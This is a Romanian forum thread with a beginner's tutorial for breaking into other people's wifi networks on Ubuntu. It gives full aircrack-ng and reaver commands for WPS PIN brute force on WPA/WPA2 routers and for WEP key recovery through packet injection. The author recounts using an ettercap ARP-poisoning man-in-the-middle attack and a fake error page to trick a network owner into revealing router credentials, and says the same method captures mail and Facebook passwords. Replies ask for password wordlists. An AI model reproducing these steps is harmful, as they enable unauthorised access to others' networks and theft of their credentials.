Crack WPA/WPA2 și WEP pentru începători folosind Ubuntu

[Sturmf]

Minitutorial "mur?-n gur?" pentru aflarea parolei wifi pentru routere sau AP care folosesc WPA/WPA2 PSK dac? au WPS activat folosind Ubuntu 12.04 Precise.

Am decis s? fiu cât se poate de detaliat pentru c? unora dac? le spui "instaleaz? aircrack-ng ?i reaver, bag? placa în monitor mode ?i apoi wash -i mon0 urmat de reaver -i mon0 -b BSSID", nu se descurc?. Ori nu reu?esc s? instaleze aircrack, ori nu-l instaleaz? bine, ori placa nu suport? monitor mode ori nu reu?esc s? compileze reaver ori fac alt? gre?eal?.

Mai întâi trebuie instalat Ubuntu direct pe hardware, scriu asta pentru c? se va trezi careva s? instaleze Ubuntu în VMware sau VirtualBox ?i se va mira de ce nu-i merge. Ubuntu trebuie s? aib? acces direct la placa de re?ea, deci îl instal?m direct pe calculator.

Întâi trebuie s? afl?m ce tip de plac? de re?ea avem ?i dac? este compatibil? cu aircrack, adic? dac? poate fi pus? în monitor mode.

Scrie?i a?a:

$lspci|grep Network

Afl?m modelul de placa de re?ea ?i apoi ne uit?m aici: compatibility_drivers [Aircrack-ng] sau c?ut?m pe google dup? "model plac?" "aircrack-ng". Dac? modelul de plac? de re?ea nu se afl? în list? nu mai urma?i ?i restul tutorialuilui, c? nu are sens. Cump?ra?i o plac? de re?ea suportat?.

Presupunând c? totul e ok, mai departe trebuie downloadat aircrack, patchuit ?i compilat deoarece în ultimul Ubuntu nu mai este aircrack în rep.

Instal?m aircrack:

$wget http://ubuntu2.cica.es/ubuntu/ubuntu/pool/universe/a/aircrack-ng/aircrack-ng_1.1-1_i386.deb

$sudo dpkg -i aircrack-ng_1.1-1_i386.deb

$sudo apt-get install -y linux-headers-$(uname -r)

$wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.4/compat-wireless-3.4-rc3-1.tar.bz2

$tar -xjf compat-wireless-3.4-rc3-1.tar.bz2

$cd compat-wireless-3.4-rc3-1

$wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch

patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch

Continuare:

./scripts/driver-select "plac? de re?ea"

$sudo make

$sudo make install

$sudo make wlunload

$sudo update-initramfs -u

Reboot.

Instal?m Reaver:

$wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

$tar -zxvf reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

$cd reaver-1.4

$./configure

$make

$sudo make install

Afl?m cum se nume?te device-ul:

$ifconfig

V? uita?i dup? ceva gen wlan0 sau wifi0.

Presupunând c? se nume?te "wlan0", punem plac în monitor mode: (dac? se nume?te altfel, modifica?i)

$sudo airmon-ng wlan0

Afl?m BSSID (macul AP-ului), puterea, modul de criptare:

$sudo airmon-ng mon0

Not?m BSSID-ul re?elei care ne intereseaz?.

Not?: dac? puterea (din coloana PWR) este prea mic?, de ex. -80db, nu prea are rost s? încerca?i s? sparge?i parola. Folosi?i o anten?.

Afl?m dac? router-ul are WPS activat:

$sudo wash -i mon0

Not?: majoritatea routerelor mai noi au WPS activat, eu de câte ori am scanat am v?zut c? peste 50% din re?elele care folosesc WPA/WPA2 au WPS activat.

Dac? WPS e activ pentru re?eaua respectiv?:

$sudo reaver -i mon0 -b BSSID (?la pe care l-am notat mai devreme).

Dac? totul mere cum trebuie ar trebui s? vede?i o gr?mad? de "Sending EAPOL START request" ?i "Trying Pin 1234567" etc.

V? duce?i la o plimbare prin parc sau la un suc sau la o bere ?i când v? întoarce?i ave?i parola pe ecran. Timpul necesar crackuirii parolei variaz? în func?ie de puterea sta?iei. Dac? puterea sta?iei este mai mare sau ave?i anten?, timpul este mai mic. Dac? sta?i la bloc, v? plimba?i cu laptopul prin cas? pân? airodump v? arat? cel mai mare semnal.

În continuare un mini-tut rapid cr?ckuire WEP:

Instala?i aircrack ca mai sus, nu e nevoie s? instala?i ?i reaver.

Not?m MAC-ul pl?cii wireless:

$sudo ifconfig

Punem placa în monitor mode:

$sudo airmon-ng start wlan0

$sudo airodump-ng mon0

Not?m BSSID, ESSID ?i channel (CH).

$sudo airodump-ng -c canal -w crack --bssid BSSID mon0

Acum încerc?m s? ne asociem cu AP-ul. L?sa?i s? ruleze ?i deschide?i un nou terminal. În noul terminal:

$sudo aireplay-ng -1 0 -a BSSID -h MAC -e ESSID mon0

A?tepta?i pân? vede?i ceva de genul "Association successful"

Cre?m trafic ca s? putem captura pachete, s? avem ce sparge:

$sudo aireplay-ng -3 -b BSSID -h MAC mon0

V? uita?i în primul terminal la coloana "#Data" ?i a?tepta?i pân? vede?i peste 10 000 de pachete colectate. Ideal e s? ave?i vreo 20 000 ca s? fi?i mai siguri. Timpul necesar variaz? în func?ie de puterea semnalului.

Dup? ce a?i colectat pachetele pute?i opri airodum ?i trece la cr?ckuirea propriuzis?:

$aircrack-ng -b BSSID crack-01.cap

În cel mult câteva minute v? apare cheia WEP.

Observa?ii:

1. Se poate întâmpla cum am p??it eu, s? sparg parola de wifi, s? m? conectez la re?ea dar s? nu pot accesa netul. Am încercat s? accesez routerul dar tipul schimbase parola standard de la router. Am rezolvat f?când un MITM, arp poison cu ettercap ?i i-am redirectat tot traficul în afar? de adresa routerului c?tre o pagin? de eroare de genul "Fatal error 2057: Check router configuration." Tembelul a pus botul, a accesat routerul ?i a?a am aflat ?i eu userul ?i parola de la router ?i am putut modifica configura?ia ?i conecta la net.

E util ettercap pentru c? se poate face MITM cam la orice, se pot afla parole de mail, fb ?i cam orice se mi?c? prin re?eaua local? chiar dac? traficul e criptat cu SSL.

2. Dac? routerul nu are WPS activat se mai poate sparge parola WPA colectând date cu aircrack ?i folosind ni?te pl?ci grafice mai bunicele în combina?ie cu pyrit ?i cu ceva dic?ionare de parole compuse în mod inteligent. Dar poate dura ?i 1000 de ani.

3. E posibil s? fi comis vreo gre?eal? pentru c? mi s-a ars chipul video de la laptop ?i am scris tutorialul din memorie. Dac? nu merge ceva, întreba?i.

[evofx]

am facut asta cu backtrack

[2time]

backtrack ce versiune ?

[fuckaduck]

am si eu o rugaminte daca ma poti ajuta. am o antena alfa si beini ca program. Parolele WEP le gasesc fara nicio problema in 10 15 minute da imi cere dictionar de parola pentru wpa si wpa2. Ma poti ajuta ?

[seboo00111]

fuckaduck, cauta un wordlist pe internet

[lfs]

Stiu ca topcul e vechi dar, am niste dictionare, dar exista vreo unul in romana ?

[jadorable]

nu merg linkurile !

[kiduu93]

nu merg linkurile !

la ce te asteptai ? e din 2012 tutorialul. incearca sa cauti pe google cele necesare.